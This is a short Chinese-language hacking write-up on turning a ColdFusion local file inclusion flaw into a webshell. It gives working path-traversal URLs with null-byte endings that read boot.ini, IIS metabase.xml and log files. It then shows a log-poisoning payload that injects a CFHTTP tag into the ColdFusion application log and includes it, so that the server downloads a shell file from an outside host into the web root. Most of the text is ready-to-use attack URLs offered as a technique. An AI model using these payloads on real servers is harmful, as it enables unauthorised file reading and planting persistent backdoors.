cfm本地包含漏洞利用

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码.

http://www.xxx.com/index.cfm?action=../../../boot.ini%00
http://www.xxx.com/index.cfm?action=../../../windows/system32/inetsrv/metabase.xml%00
http://www.xxx.com/cfide/administrator/
http://www.xxx.com/index.cfm?action=..\..\..\windows\system32\LogFiles\W3SVC3\ex080310.log%00
先猜主站日志，访问一个不存在的www.xxx.com/1.cfm可 以看到服务器当前日期，比如“Date/Time 12-Mar-10 01:24 PM”，根据这个再编写日志文件字典，可惜主站没找着任何日志文件，在metabase.xml读到一些分站，找到了分站的日志，w3svc+数字编号， 这个编号就是站点的ID，1为默认的第一个IIS站点，但可惜IIS日志会把空格变成+，所以cfm代码执行出错了。这个日后抽空再研究一下，在cfm里 是否能用/**/或其他符号替代空格。

2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

后来mickey给二月另一个站点的cfmshell，二月发现coldfusion是有日志的，而且会记录包含错误，会吧包含的错误文件名写入到日志里！

因为找不到b/s的cfm木马和一句话cfm木马，所以才有了以下cfm马儿的技巧：

http://www.xxx.com/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

http://www.xxx.com/index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>

http://www.xxx.com/index.cfm?action=..\..\..\CFusionMX7\logs\application.log%00&u=http://www.youname.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm

成功条件：

1.WEB目录可写

2.coldfusion目录和web目录在同一个分区

3.多个牛人的群策群力

未解决的问题：

1.iis的日志会把空格变成+，不知道怎么绕过

2.coldfusion会把单引号和双引号加倍处理，不知道怎么绕过去

主要还是二月搞的,以上主要由mickey做记录,我修改了下，我也怕忘了.